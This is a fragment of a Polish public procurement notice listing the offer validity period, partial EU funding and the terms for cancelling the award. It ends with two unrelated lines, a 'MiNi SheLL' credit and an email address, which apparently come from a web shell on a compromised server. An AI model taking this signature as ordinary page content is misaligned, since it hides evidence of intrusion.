<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> częściowo finansowane ze środków UE - projekt Pora na aktywność.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com